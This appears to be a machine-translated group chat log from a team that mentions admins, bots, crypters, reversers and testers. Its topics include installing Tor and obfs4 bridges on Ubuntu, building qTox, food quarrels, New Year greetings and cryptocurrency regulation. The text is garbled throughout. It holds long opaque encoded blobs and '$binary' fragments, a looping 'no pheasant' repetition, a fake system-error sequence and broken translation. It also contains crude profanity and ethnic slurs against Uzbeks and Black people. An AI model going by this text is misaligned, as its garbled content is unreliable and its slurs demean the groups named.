``Guys who use Pidgin - all have problems with buffer when copying from chat pigeon ?Either in sources.list or in a separate file in sources.list.d.@nicholas , first in etc/apt/ add the repository torproject, then apt update and apt install tor.try https://askubuntu.com/questions/382394/how-do-i-install-the-tor-browser-bundle-in-ubuntutor is already the newest version (0.4.2.7-1).
0 upgraded, 0 newly installed, 0 to remove and 5 not upgraded.Hi. Is `apt install tor` okay? Hi! Does anyone have a reliable procedure for installing the tor band under Ubuntu 20.04 (google and sudo apt install tor not предлагать)eyJhbGciOiJBF8WA6RitTnGcIq3EPPRMtbD2iDVc1Woq0PV8Ru/Y11EJZbGjEJMU2mpVgHAa7mFTs6r99or6w6Lk6nY4Y8FJhTt9dEdkm2hX2Zvaao5PNZ8uhL/TSxKTi1g2+H3txSpqpp5kGz83u4MnlnWL/hAvYseJ4e4p+OIsOynmtxhM494=eyJhbGciOiJBCtenDT8LUO6mciozkuk4hqan5GJ54i0fAZjcQhovDqyGuwpbeuAPma0jTI2jk3f3QYN25oZNn14FXRx4tOwxcSfJESXIgXhSoN/5ubaoxRriAipCQ+Ho6PLMtetKVm4xQ/T0vPjV0juREv6KhsbOxpuWQzfSe8FCyWaxf37FiTspwXB691HksEsN9/7HUMNEUqGrzAbAL2yvDXW6SfDUpQ==eyJhbGciOiJBDx6aWKJmaiV5AvJJimHwsapzAw8Ho3wU/DE3n2vTQxebucMH114sukKTSAhOzVstal0qriz+k5z4Sg2rD23/woAB/3B7v/LICUfLaSla+s248+AJJw9uhzjhK+Uo1/KOLeiQdOkl6nDNZInjM34r6ShbFrl+HkRH/iuvEBxuCJw=eyJhbGciOiJBi8zxsyssBBRZGB4/IlyfGOWT91PlNQxVm+t0YPqUjioOc1E+tOV3MEVs69to7nUChbFvlntGOqJhQ5BkWXcUsgv+XHEIjMddzbdT438rAhfWlUVmA48u8P5c4IgJsGJrRWTPWberuYSyMK3+S8URHRPmmG50RHXEtRP7QA6PnkXm/nrbCrxATR4cMOrXHPgvPBf3RbYoCSleJ9udeT3+0w==eyJhbGciOiJBFryznhuylI2Mw/v6bF2qXFVffMMPCQY9tYowkywDb5j8wKbgWz2a6q0N+4H/akUz9CKW6Qkx+q2Vp8z2+Ex1yTdPZipUdY/YuLsoUPoQermMgQBiyqSxszGk/84n+3BYJgDxH8Ec8VziZP0uQdRhuj0ZpMOroA9YqkyViyM will stay, but it's all cleaned up in half a year, so don't worry, you're not in danger?it's funny at first, but then you can't see your dick and you're already sad haha[f] here, handsome, don't fatten up your stomach or you'll get mirror disease later on...don't you have any beer?
the beer in general all beers have no taste whatsoever...).ttuborg is not good at all...) with tuborg not bad, yes, you left - I'll be back soon, don't miss me and then your ass is on fire and swearing.This tastykfs + beer is tasty but bad everything else is lame potatoes in a poppy.I would have given a lot of people if it were my willdolboys parents kick your parents in the cunt, And kids are fed all the way, kids at poppies have been eating potatoes since they were 2 years old. They don't eat fried food, they just don't know how to fucking cook, do they?They often feed kids that kind of shit, kids with salads from the store, they rarely go fresh, or rather never a priori, and the salads in the store are always dnosalatikami and people who feed their kids eat it and don't give a fuck about the fucking economy, I just don't understand why the fuck they should. in x5, it's weird to buy ready-made shit. everyone saves money, but i don't think they cook it very well. is this x5's azbuka vkusa? i mean, only my mom's place smelled so bad. they've had a rot rotten meat salad once, and they outsource this shit to some vendor in x5. did you think so?like everyone else? no, they have just dirty Uzbeks cooking with their kitchen, did poutine's cook? what did they get poisoned with?They had a poisoning last year. Cut up vegetables + grate cheese + slices of cooked chicken, even sausage, and everything into a flatbread pan. I think you can buy ready-made grits at the A to Z and heat them up.he's a total cunt, he poisons his kids, some people get poisoned by hrbchev, you're just like Putin's chef. Feeding people is not worth it - they sometimes poop. I even have recipes in algorithms and the recipe follows the fucking proportions, unless you call the restaurant DIMENSE they are always a bit different, I can't repeat dishes, you're just developing scoliosis. You don't need these computers, open your own restaurant))) and spices in one bag with the words "I don't give a fuck what kind of Caucasian spices" I'll get drunk while cooking, pheasant, there's no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant. It's not Kazakhs, you can't do it canonically... You should have said beef... I'm fine with chicken...You fuckin' crazy? You don't fuckin' canonical chicken, you fuckin' need chicken from sausages? What are you gonna make pilaf from? It's greasy and fatty, it's delicious, you fuckin' smelly, I bought some lamb to make it. Only if you order meat from a vendor you know on the market... You from the producers, I don't trust random vendors.I don't trust random vendors. I'll make it myself when I have to go to a local store. And I rarely eat sausage with sausage.at the mass market, the food is on the feed... fuck... maybe i'll go to a fiver for sausages... i don't know what i'll cook/buy... but please, sir, go eat already... now i want to kill him and someone else... did they ever tell you that when you were a kid?When I eat, I'm deaf and deaf and I don't have an appetite. I eat, don't I? Now @angelo is gone, especially when I'm working I just chew a lot. Kermit, get a woman to cook for you.
women usually eat more than me at macdacs, he goes to see a man or a woman, I don't know how you do it Kermit, get a woman to cook for you and don't eat rotten dumplings like your two comrades.I don't want our star of skepticism and pessimism to die of starvation. I bought some sausage, you've got dumplings on the walls. I had an expired ointment for 6 years. I still remember the fucking smell of them. I got poisoned once, don't buy dumplings as a last resort and eat them. It's not the first time I've had dumplings and I'm too lazy to cook and I'm too fucking hungry. All the ducks have died in my pond. I can't believe I worked here. I'm sad without you, you are a huge part of my heart!@kermit hope you're at least alive and not decomposing under the table in the kitchen, I can't stand itThe mountain of fallen bits got drunk on the remains of these bits? Where did everybody go? Cyberpunk of our time) nah, it's poppy Hammer, sometimes I think you're a safety net for writers)) Good writers )Have a nice day!!!Error...
Establishing communication with service technicians to unlock the camera lock...
No communication...
Reducing simulation area....
Reducing allocated memory....
Reducing the GW$hage74G// to the lower threshold of the life support level....
Remaining charge is enough for !#( yw4
....
.... DANGER!!!
Low battery on life support camera....
Automatic lock release....Communication established....
%^SUCCESS, a reminder.
According to the simulation test program you must adhere to the ecnfyjdktyyjq program of action#;y, otherwise #Pevvvnc56 WRtvn.......
....
.......#%.
Eggca....
;%bka....
Osh(ka....
No connection....
Date of last session: 12/06/204^
Time elapsed since last session: 1{568# DAYS

Switching on the communication module with the neuro-interface test camera............Getting power from the solar panels....
Area of working panels from the norm: 0,04%
AI exit from sleep mode....
Partial s/-+++++++++++ Exit from energy-sleep mode suspended...  
Communication with the central control to receive new instructions....@angelo shaKazakhs will catch upStabilityNow so always zp got and bit fellkhekHow do you fantasize with chip you will do so forgive you here do shit lying down, no punishment, but they cover the skulls do not beat? or Kermit call?preferably be laid therewhat are the requirements? do not like people and monkeys, like experiments? they whisper that there will be trials on humans, after already successful on monkeysIlon Musk's Neuralink company, which is developing an invasive neurointerface, has published a vacancy for the director of clinical trials. It's reported by Bloomberg.you can try an offshore tryyura! @all happy new year to you all TIGERS!!!! I'm sober as a glass with a new year, bro!!! Happy New Year! :) All of you! :)hurraaaaaaaa!!!!!! Happy New Year guys !!!!!!!!!!!!!!!!! sober )Happy New Year, friends!somehow it did not sound like that ))))))) call me, 100 bucks/hour what the fuck if on new year do not offend, so i give you a brotherly hug and congratulations )fuck, i would be scared if on my new year you were Santa Claus and he still have to wait for his time, i would be scared if you were my new year's Santa Claus, he'd still be waiting for his time, i'm always sober and i thought you'd be the first one to get shitfaced)not everyone's already shitfaced except me and Kermit ?)wow, twin)VSEH S NASTUPAYUSHIM ! I congratulate all with a holiday! I wish you all good health, a lot of money (in your favorite currency :sweat_smile: ) and enjoy life more often! Best wishes to your families, lots of positive and happy moments in the new year! Hugged - cried :laughing:the whole year watching and decided to give my opinion, cool captcha on:
bridges_torproject_org
where case does not matter ...)brothers, happy holiday to all!!! And those whose time zone +9, then a happy new year))) Happy New Year to everyoneChpongpingVo, Kermit brother in sobrietyrebutni and for penalties bild car@demetrius@de@demeble hung server100-200-300-400-500-?:sunglasses:100-200 grams of whiskey? The passing year was very interesting. It was a lot of things))
I wish you a Happy New Year:
- Patience to our admins.
- vitality to our bots.
- Fortitude to our cryptos.
- Diligence to our reverses.
- Resourcefulness to our programmers.
- Attention to our testers.
- Profit to our partners.
- Kindness to our managers.
- Great patience to our management.
And good luck, gentlemen, to all of us, and even to those whom I do not know yet))) Only there was the beginning approximately so: This year was x???? that's not a secret. I do not remember further =) something like Zomba style =) New Year wishes, or congratulations =):beers:Strongly said))) Happy Easter, my old comrades in arms! This year was interesting, exhilarating and sometimes very lively!
May the guys @elroy keep us in the battle crypto greats, may the code of the guys @silver be as pure as the thoughts of a child! And testers @manuel search and find the secret! And to the @adam admins, I wish whatever it is that's going down doesn't drop!
Our team is as strong as Jennifer Lopez's ass, and the power to fuck our enemies is comparable to Woodman's erection!
We are strong, indestructible and fucking awesome!
Crypt to your wallets and love to your homes, my darlings!
Let the fanfares of our victories ring out for all eternity!
p.s. And also, that @frances and the Commander-in-Chief love us, as we love them and the bits :D Happy New Year to all !!! You are the best!!!! sorry guys, no dicks today (─ ─ ─ ─ ▄ ▀ ▄ ─ ─ ▄ ▄
─ ─ ─ ▐ " ░ " " " " " " " " " "
─ ─ ─ ─ " " ▒ " " " " " " " "
─ ─ ── ─ ─ ▀ " " " " " " " " ▀
─ ─ ─ ─ ─ ─ ─ ─ ▀ ▀+____+____++____+_______+________ half a hole))++++++++++ people play on emulators with old roms anyway, and so would still buyNintendo could have long ago released pokemon on pknu or a glass of kefir, if he is for HAW, here I do not know a glass of cognac?)It's not a leg third, that's what Weldon likes when in front of his face )It's like a wake, come to life ... You have a way out, you need an old freezer. You open it, look sadly, wipe away a frugal tear of longing for the snow, smile and go back to the sea.Happy New Year!
I miss the snow, I can not see him for years, the beach and everything Nintendo sueTypical bunnyThis is a fake) That's just not PikachuTail on the rightTwo front and left? On the right is two back He has a new skin) What is he? The third leg? Who bought new pokemons? Pikachu! :)░"▀▀▄░░░░░░░░░░░▄▀▀
░"░░░▀▄░▄▄▄▄▄░▄▀░░░
░░▀▄░░░▀░░░░░▀░░░▄▀
░░░░▌░▄▄░░░▄▄░▐▀▀
░░░▐░░"▄░░░▄"░░▌▄▄▀▀▀▀
░░░▌▄▄▀▀░▄░▀▀▄▄▐░░░░░░
▄▀▀▐▀▀░▄▄▄▄▄░▀▀▌▄▄▄░░░
"░░░▀▄░"░░░"░▄▀░░░░"▀▀▀
░▀▄░░▀░░▀▀▀░░▀░░░▄"▀
░░░"░░░░░░░░░░░▄▀▄░▀▄▄
░░░░▄▀░░░░░░░░░

░░░"░░░░░░░░░░░""""▀
░░░▀▄▄▀▀▄▄▀▀▄▄▄▀))))))))))mlya, I can't calm down, "with Alla Borisovna I would hang..."))))) we need collective work! We all need to make a wish - and the bit will fly to the sky! I do not know where it ended, but my snow will always be white!They just ran out of snow in 2004, so they started doing fintikosNo quality from Germans, not even a frown, they've lived long enough! Guf Novogodnyaya for all times is the only song from all russian rap with the name "Novogodnyaya" like that :D But fuck, no decent gerdos, so they say....YOne snow gives us the sky,
The other is brought by Ded Moroz, Tajiks and Negroes
 With presents, in the depths of their stomachs
Or by big trucks with the last harvest of fruits.:D Cheers! Spools are already booing like that ...By the way, soon they should bring the snow)) the snow is not melting, here it flies not yellow snow! but the snow maiden, yes, we choose snow! )In general, I often wear red clothes and turn into Santa Claus )From you candy))) Thank you for the tricky question "Who will be the snow maiden? )More interesting, who will be the snow maiden)))@angelo how about you?)))Happy New Year to all! Guys, who will be Santa Claus today ?For the lazy)
`https://bridges.torproject.org/options`bridges.torproject.org/bridges?transport=obfs4` you can request the same here, and then manually typed *request at the tor with captcha - obfs4 bridgesbozhechki, without me you fade away !If I'm not mistaken, I will try to use a bridge with a VPN and such bridges, everything works fine @weldon but bridges are built into the browser or a bridge request from a torus? there is such an option!@Garfield i have, in general, without vpn, no bridge does not want all hello, all happy HAPPY (a bear in the usa))) one of the torus that i have in the containers does not connect directly without vpn, although i got bridges to it (not connected and all that and bridges does not allow to change / new request..nonsense), the other tor connects (also with bridges) without a VPN from the same provider, I don't know why, versions are the same and both worked recently... soon, and just torrent trackers for new movies without a VPN cannot be scrolled through torus on an ordinary home pk :pensive:eyJhbGciOiJBdvCKKvinH8HIyT33ey7wl+Bb0gMCWMlKVvfnG2VXbu06Mw9R4Svl/OOMBHeRJdxK9EkVIp/Q99QUSEyEus/UW9Zt4KbuGcQ5w9izfLMZGuKPHP6w6ab+NXIUv60MpFTHi7+HNJZ1ohhG11VQvBsMvUHi0mOmUuHRYjGE0gk/4PLl5BovbKCKmAEhXdKQ5tWVeyJhbGciOiJBS4EzbTPadKimBAfAqas/OauHh3hbEWo/oFs+xChw26Dx//vbo0O9b7HaGt0ZHV/LmVBy9EvNKTY4QTB2VGV/aEMuXzZwwR3nEj0oMQa6vxqZmWKWUJionltYIX8b4fwqGatP79s793eYykPmnhfamHt3dLxYVCO4Nf1ozV1JGqdKlrJKXw7O7B9c6ceJ+mnpPivmjhRijX2/ETWK9kBmajEIHLWeNfVMwtH6esCHBR3Pjmt1h1JAamlY/o4grL9kfRqIGbbOpDe8Vt1dHtWIRTRVagNfCTvJO8C1vrcuehfu1jBGxToMxMZZlrrJ21wtunbYdRxtydnb1F2QW/Gjy931UsldozJfriUiQjcuLUcbIYZBL2M9rQKBYyYqahdJegSqVcZ/twlyt1Pwb+TIqJ5pG9GwN/+amKVOFm55I9iFxUWNqGEWHVjM41dCsy4FNt7g1eoeP8t8+mn+Te/h9f+aCNPaZTX6PBOGMYu6eTAvy7/l6C5wtG+Eyl1FltQ1aWys/2TNx3o72JCh9t3p9d2fQZVSNKwYN5cZ1yxHcuf9+apietrOz1IhY/0VUc1NogTeB/HmpOXk0fEyeJQ++C6WTHLsbBBB2sFy+gsYAZi9fY0pp90V+v+S110bAmBHHeloF2W8WxKruDCR+feIJpcMh7fRLxiuJc2oJhkn43HKIFNToKLK9KzBLRYxkHauIaPJBaAiyc/MDJTv5WcReG7LHfMFtnzqBwj+y2Q3GlWRBxywW3O+l0eWR4srZHslT7vMnv60BzihF6JbjlxgsA==eyJhbGciOiJBDwdv If anyone has ahas a second channel "general" (with an unread message), Make it "Hide".my first time did not work, I got stuck on the assembly of the qtox and describe the process )@all who will assemble qtox on the wind will get a bonus )yes, I would take it to them - let them live)) and europe freezes)) apparently we do not, they do but the issue of energy costs is very serious in this area...or am I thinking of something wrong? KZ has restricted energy supplies for this kind of activity until February 1. There, even Kazakh miners dream of getting their NPP)) the surplus energy would go into the ground, and some of this money goes to buy mining, an inflow of foreign currency, but first weigh the pros and cons in the possible direction of the surplus electricity, of course, today the surplus of electricity.The right of claim is contained in a bill of exchange - it is handed over to the bank and exchanged into credit tickets. Loan notes - contains credit (the right to demand) in accountingNow and debit/credit still works, noteCredit is the right to demandIn the 15th century it was discovered that with credit you can create money and gold itself does not need debit.Debit is debt, credit is the antipode of debtMoney is credit in accounting. Credit is the antipode of debt. What is the antithesis of debt? We have been told by our brother that there is strength in truth, we will go to heaven, they will go to hell, and what else is needed? )) They'd better relax and have funHow are we going to fight if there is no sovereign system?Everything is as old as the world, taking surplus money from the population and the budget, the budget buys paper and sells valuables. Everything worked in the USSR, there were treasury notes of 1,3,5r and state bank notes of 10,25,50,100rTreasury system looks similar. The authorities pay treasury notes to state employees, and then they tax them to business. The business gives the budget holders nickels in exchange for them, or they are pulled off the gold.One way OstapagestkoThe scheme is easy to lay on tokensClassic bank scheme looks like this - a person sells another against a promissory note in gold. The promissory note goes to the bank - the bank exchanges the promissory note for credit notes. The debtor must redeem the credit notes from the market on time and collect the bill in the bank, otherwise the collection in gold.Yes))))) I think it is exaggerated, 6 million Moskiches, that is more accurate to be> in cryptocurrency keep their savings 6 million Russians
That's cool to hear him say that. I had this thought for more than a yearIn fact, you have written this in the middle of the night, I even woke up)))) In general, legally hacks - the topic. The progres, by the way, are masters of formal logic, and jurisprudence - that's itThe judges are vibratinga all right, it's logically so, we must change itAccused the general of the FSB of treason, and sort of ask him not to trust. One man defended himself from terrorism this way. Since he bought the de facto requirements for NATO, it means he was rendering him services - high treason. People used to troll officials, accusing them of treason. Its main objective is to buy treasury bonds of NATO countries to secure the ruble. So they are quietly taking away what the British guys created in the 90s. Give me the ability to print money and I don't give a shit who passes lawsRight, the state monopoly on banknotes is the basis of powerThe man who made currency in the Moscow region - the colons, the FSO knocked his teeth out This is the extreme, talk about the Central Bank not replacing power If there is no monopoly of the Central Bank then anyone can make an issue bank of banknotes, secured by promissory notes, and gradually take it overWhat about the Central Bank monopoly?The fight between the liberal part of the government and the president continues, the truth wins)) Vladimir Putin spoke for the first time on the initiative of the Central Bank to ban cryptocurrency in Russia. In short: there is no need to ban it. If long:

- 6 million Russians keep their savings in cryptocurrency. The total amount is several trillion rubles. This money should stay with its owners;

- blockchain and crypto are a magnet for thousands of innovative projects involving the young and active. Predictably, they live and work in the countries with the most attractive cryptocurrency climate. We need to become such a country.

- Russia is third in the world in digital currency mining. There is no reason to lose this position, the digital financial structure is a good thing;

In general: there is no need to ban it. It is necessary to create a clear legal system for everything near crypto. Transparent rules, understandable mechanisms, security and adequate taxation.
https://t.me/breakingmash/30815Выздоравливай! Don't give an infestation a chance)) the best reward for a guy who has a whole brigade behind him! thanks guys@angelo get well bro@angelo get well yeah, pump up your av base from all sorts of omics get well, getting sick is a shitty thing to do if somebody lost me, don't hope so, i'm sick, i will get well soon with your prayers, love kisses, your angelos("cls")?)eyJhbGciOiJBk9uO4AweAMWMhlKlpg6rv5GKpl7wqeOorTNrTDPOkFQQqJ6++B4IPZIMahU7h7Qls71IJq9qZhWDpEyu0JDRVnZRVfID/M+bVUE4isjLBZ7C8TUsDq1oXwbT1nk7JsSU4Oz5pjpPfddL5igayJUOqEoMp/zyLTkr4O7mhAr6nAzjpctK1I1DzjTiBTIlNmPneyJhbGciOiJBMsi/F4TG5hKB8NaJsnPgbok2KhFuW9ZrW/fjxPV4orHfO1xOPKgHhJvk2g06mN1m6lTrArnP2YXHD/q71mxSDPNIUYsns72nwjDNfZJ5H3q/qV5J9CaiHHnf4Xd6kYam1ojq7y5087B3KjnJ5qbcuAqKxpob37s80OFcrSyax8eUkwKju5sjEZh/mllu4babVZkhi1vGtwpXoMLVZpzGhrm16+0dhLzcFT8L1ZrLW3NQVYRJVRjdZfqeSdqKlhMgvQk+mbyi22MYKpeKFaqwOSJ0MUciz0i3nfndLjSEXQv7SPFMxNX9wWB5Rc13wRgo1X4riPxJTazs909JSwJYzPSCxUmW/6DgnQEXq0nb1W7A3QECvm7K6+YGHBmjhxPloWPm1niRQfRjTF09AzK9B/gH+sjhfgK0ijlMDAwCjK7NOWmoOA+vnJyhZ3avdjROtqR6916fXwSevi+rWtt0Fa+x5n1RFaOsBKvlk0fm1ijqGP+QEjOLve8POgiW+UkQTz4K6J5UIsx+ApE9TZxJaJHMTOVpVXknLNEVqsnrb/n2j+JWEsPHQcS/fufOS2sXwt8VolbiM1qvkC4VeMBpDnGZgsxFUQgzwWaDgNPZBr3ijTfA3hK7surKlzU3cEf8+oNf8HyKPt+sP3z0YzitAciRwBKLvgb96YYACRwZJFvMyimOotM2vQqXGpuaVhQnG1skWjjuNeQ0ItqezVqoLTofriCFt55Ih55qv8gFCVIr9jHv/LMJ2LqxUFECniYJgzO88yXm5ZLD0IWhOd/oOEfdf/engtGRu53yzML [from Garfield] -> hello everyone. Hey people, who uses proxmox for tests, does it work fine for you?{ "$binary":"cl9Dr2ihCDlp2+OyOrmjb1Y3X0FVoF75bj3GxTHzvNg9Cttp86xvPKiFLSs8i4lQ4cPDucCDjuIo2mQyKSwHBAvtWUACwSi7av9Dp9tCQsAevGqMO+tcxpg2PkADGCJEhQmFEp45lBaVDv1gPT+7p7VqhauYgOahPVY6cvgC+sLMrhZnrXblHwRYeip5h7twEOcqptJahBprPspmV6bRbYQE44+48kP9CqOtHbVg"}{"$binary":"sXpPEutHqSF0GRaEowNecTpgrTsnrXBdHNhLGyajgeRpwOLRDWr1jDfUNp8vvEKPtt2RUtsdUUlAhTq65Bhgi1tDZ0lY+s0zsgakxr7qe3S2bWNxO0JVtrqly0IlT8+jYmVh/x3Ez+JhcO8NCjzlvL4rFOK+0PUkLatHRCrjcM10Y1Umd8/p5ythEXHcnPwrkrwkBBdOIvq88f81cXRFzYnwm8qwGZoeqsOCqRBAjE9Rgb8nTi2dVdAb9A1sH8ivcdOWVnONnQ1IHmaHwN+WKekJ"}{"$binary":"b712fvthVAgmrvU363N/xpndsECnwxDZXu3pVs8JO4qJHAV4h3cbsEIvsSDSnU4/QFxIlxdPfKu/sQ15m9wSRFtfuX+Xq5MLCcI0nZaIvX6/ghKtWLdzXhogAIvBG38t7oWKmseA9dAplOf6NObAYdr5E1em0g9QcnVHcZHN34Jgw6aLTOF6YhWv5K2T3b48arL9qxvREPliCv6TVocH3X+5p0gi+U5/5eASlbfoM90r"}{"$binary":"eFSQWeT6KjAxaliWh/pgVY6DPA92BCSEHwa4RhpxT+M/kct1yQROb1tXf4R5VHhDlpCCqVogKoK/E201eYhfFpR2OOC+vfPCYEsRIYFFbQ7rJIX3wdtRWcNDsqlXmswYu4eYcNOI0R0V+ljFjJFR3iqWyBGzKkQw9XDDJ7P4c9FeAYYNVJzmewMXItWALJpnY1EtaU0qwCme4g25EUSIsC2x6wWKbolDTxP8d748btbp2NYj6pA="}{"$binary":"/dTzEC+DM9rbF1gP2XhxFiDHSb0XKno0jXnDS/dq2qVUtaz63g57a60CQW5OhSTrlWkvqjrRGeGt24ax0cjdIWhXiEIOEUtEB5Bhhedxyrpie4vEVmMGVzX3SdNGwN5NCApnvCodZXtfS//z0IhZ/7qq98L5S1TvSLpZEYWuFQxCy0FuJC9WOUWKBAJnKV+BEGptTURo7y0d40XYy09fp2ybmQXcglUWNnVrFnWVmBAi48ZbE0sbyWoEO8nQ4LVRYErL2EBmnq3HVFwAHEZfkyFjdj0OJ4QH5Qn9"}{"$binary":"g+vtDx0gvkOmESleZx8UsXspUg+lMM3NGsptMmqC6eSgHGc2f4QTxU92gAuVB/l84YPcwm/M9eWla13hvnOD/5Zg686K6qFApZ6grCcsN5hVD0ozuqIbO6Z9vrev85eAyDG4OftNshvocVKnOZAJS0k04F9jxV2yni4pobiDmNrZXKY4stZKN4/ghg/cdej/iGNC0uDBkqdMwy38AQY48fB2utLqzOKYsLXe29PqTXQjyXlVmRk="}{"$binary":"re41rpIsSbRwszNTt7R42Ly0weLxrNmyqcJhPSMkK2oZ/pATOKJxSkByFB0+Hn4aP3gzE4jxVtJBV84v+/QJfjN6YvXnU834FcD9NyAiMxI8IdFXJJ8EATQeBfKUAhWp7KXQHWvYB+z4KUFZ0YnDlOpflp4q4l2WCebi2tPQRr3Tx2ZghJAymU3cBZPUxHQ/b2wBCT2z2KtuXz8kfYf01MXSnZcE7gETWoIXQDu2Z3AOJ2Lo3xbdTaqKpYE+Uf9PPW8Fx5ngjVQu2smoGVPYHA=="}{"$binary":"tqaU4oydt5l08m0fxN9p9jEyeRcWFd1lmDwl/m6N9SbybPkKTPo83C9tCSxj2Mdd5dhb8GIUTU+vYq9bYHCnKqpUYDPVtbQ1281Q+TuzKW8tKyhoRVyAmiRPul85e7wlQiWaLRR1txY50+V0snM7IBJWJPrUWxFHrZpwMRg0jmBGCpt+/30FwG4BsrmW57j/GgJCuadoHCHqC0ioBjI1m9aJzr8EWzzIJw=="}{"$binary":"XFpFhk46+bC1yFa7nQkKMViRwmD+jJAX8PIUydbE+6mXJxtbyWMVy6jNb+60GxBrEx3Jcul/BUtyr6Dlug8qCGs7tVTFn0ErJgz16f78qcLUFTnjdZssNHt2jknoemxLTWeiKKMz35fL759ekfplPEm4iXxiOcdN8dKppcvKtCp8MR1pHF43Bx653Kp4P02RLPPFmXg/zXyWtirEi0hnJ6sHQM1Aj9AuhtH81jsiutN+ZfOfAsfduxhnTcr2x2xkDzSDMQ=="}{"$binary":"z7X5FY0dB/3HeT0w1ObQ8I5YWAQsz13mHQUYlcB8APYQLus/Yw+AvQIvJpaYkBYIat7WTTCK8bxfSZLbL8WGtBeDI8QINb5WXk+/ukvjNGQvhNN9Q7OWTYOFnoL8FZwq33OayNsDe2jIr10WuSJTibev8QdxqVeL0P53McjI1JR028JXGOb8sc+6UOytgoMtxlUz0UaMkpsuYYTGtNOdZLJuVE1mnTo2fRG2akIV1JBehfqE051zQnkbbzPgccyAq8F7mJyuSVNHwytcMYP02lG7P4Xpg8aoWpZ+W/046tcOPc3fvXgAyT8AJwImmYFOzUyqBKEUDxxvxVniKwzzlhXzr11FWEzfL95Y0vJuWPGcjEpZ4gdIApy41o0Z2xZqoOHk0wKQnYqFg1NIe/zfdO79LJxbOh+RoGJDoaxYfWNCMOUcexZIEB/ktrLr5mR4BEoDPMBfK8IUBg+cZGgFzEVoA9Nh+fbzNl0yYutiunYAKsAUgm9S3xWygAyV8p/lcgBQJgw6/PlVBUgKYQGoZ6JX7DdwGFLSI4Jlhq0sknN+KMK58GdD8SlA7xc5DQ=="}привет!here?приветeyJhbGciOiJB0bFG8cFecJELZUro0WeuZ/gTjOQ0KcUHvtj1zg1rvM+cE2cMWDqP0m/d4deGWLTMjRMsg27Yt9n6JuNu/Qw2QVHicLF+6o336iWN6Ny1tgq2QfntJg1+mMnC174rtSt7tIk6NyYqUzASa6bfFcv8NMTfitEBDhSob03+F1E9SicBdsErkpe4zjRmGY+K3Oz9eyJhbGciOiJBlh7kNYW2NhL5Us/djf5hhAv+H8hOkTITEHlxBe7pKefbBaAOjkGIjmgDSCdBpmPTp1V/nwWDOdvE3qOysSbsMF2V2DkJ78SL4+1t9fDTHvE4/ox+VMhk130HiS4nr9FMPOur/W/4TGVX7TDIuMNmKGTSlrDVHZOfFOqwgTgaL2o=eyJhbGciOiJBXZUnffLxyVn9GydLoogt9OFFUM9cYJ1C/InlpD64dMISylPPdMnc7Rr94OrPuRIaqklKmYoYpSh9utCL51iBpkMSLl9b780wn2PHq/v2ULYdPSBKN2VmC3g/xJWeFSFv4e0ul6KOuaSKb3rjvR8Wg8pbDXFS5j4B0TXcek6VOiM=eyJhbGciOiJB0+cem3j3eo1jVxzEBrjsZUNvC016YzoK5D985bGzfWczQqM21nAeZUjYKMmM2jmxOhZlMbimJ5YaNXWP/PvRr+7Q87W/0B/IKkGGVmvs6+TxdTj4oizdrhOxXNBzuBvlxAxyW19hC4Mbj6TP+hLFtN0fS0ve+D4jGWX6kwCFHAM7JGZglqfYuZ2u1nhzSAvlvPPWYKoW9qV+3yjJHp09rk/rwpGPmhmlXEcb5kyZoZNOJfCjZoIpd0qs9jxF6rC5k8WKN5yaGatrAVTpnPpwxw==eyJhbGciOiJBz1Uay2JHqQj2+ME2to9C5wAfsOt2DUFFHouXGVTR+7KPOQUnl0p9gSWR6qDNOJshZtD4GvknqYoGuHyrmsudo53AZEc7ubpSlgpGhIdZP15osmcTR5FB7mRX626wPjTwo0HhBHgd"KR2v1b22JmjQvEwzAfIgpUlKrxHeAeluU9VhhQgoRs4PBvJmiSsueg1mwz8UlfL8pxsvrJiKcMmomGBkswK88TBF60f0NSPHtpyZz7X5ZpGC9DUOTS+nmOoKlt0Z40idHLykLgRc8zGEfy2TeBnwLHTV4lo/cA8qrzb7Tg3ErqbfzzUPX3BSvJvbobQPBb0pYHi01A/88yysfSs/1Dy8Aa3SMtC1k5Jh6Ky2qQ=="}{"$binary":"Y/naAUMwyuTeU23AAT7bi+2DmcX4cpEFkS7MrLeOYr/vyaZXR90Jwq4K3qd2uxYoraffN61zuIKbaUN22WeNAargL/BosbMBvE5hjTvona0LCnoh/HazTShyJGHC/tMlKyW6IWgArBvaFAJHbz9fbyAx2rxz4RiuTVfvxwtftcdFB50kuv6lUB7UD1EuvdQd5LQQ3zaYtew8x5/6JKhXRMz8HWfZbg="}{"$binary""AJbLbHk+8MUUoQ6MF1ofpOFT/BgFbPSvbT2H0i+kYbkjwKjmlIdgwtzH7UTxVCoWs8En81FY4vTUfLBdh0dg72jYC3Ei7US6QAAkhdtBM6gbB8eFW5kjEQ1MlgnVUejbdFOK67RTt/I8qPXmH4cNscumrme1GFMWMVaJUVhvptgX458UEwOVutx9J4yBqV9y/L5o1hsU9LOOmkgF1dWtEUowO84lFMnXYDsE8lNXQkY7AV/D7j2QhMutt1zGiijc0LIA4A=="}{"$binary":"i9Vr8snMs1Mt/qMtMBVPf79SIEXiabvBmN/7k46OTxxERoNQlepBqIcAfrOQYmB7vazr5P3d/Q4iU9Mqzpt3ICbjatlJpPsFAQQmYftTiL4185Saj0nrgibxmKvcMivM9di43p7gEJQG7X4UWwpWwl1kG1j96WojfHC+n618cg6HzjyWwypFs27iacalgmKXxp815MgSqiWvfvWboMI+PBuQXwHvsN53HLcQLjE6djdqBJCFr4b32Ni+AuGnWSO27b8X"}{"$binary":"KXnLvR295iUhZvTWSapQV7w8C+nQqkh/rgJ8r/wyNSquhLV4sD2gJxPWN/GlLHKmPtdcQA6RutA5ug6+1MsBfBB6Lfz3FBBegYf7Pdt3EGJpIfvp9WhxEVVOijnH1mo4dmLYyIco04ChRin0RBv5X339mkmC0rJ8fTnPEUcsQALyalU2NbnIAzWQ8vyUiE2fqjrn/UwlR14MN/qGL/bDW3MX9lqhHgmyXZh6iuMpBwtm"}{"$binary":"CCfGrZ1cLmydKGZ1YXxWl3EgBLBcJHuorr9Z0+CeSlPph4Uiyi3CGWXV0aZ4sy1M9QVpXtXzjX6QeViMgJyGEdqvFzGjRDG/F52JApK6AjQxN2eNVK8zf6J2H66DlqRGgqwbZtLJ35oocJGERjtI3VPXfqpk4gtD33BgeuX7GzhwZUBRjvfm15VKuPPzvfUNo0XK7vy+0WOUMpOUrHF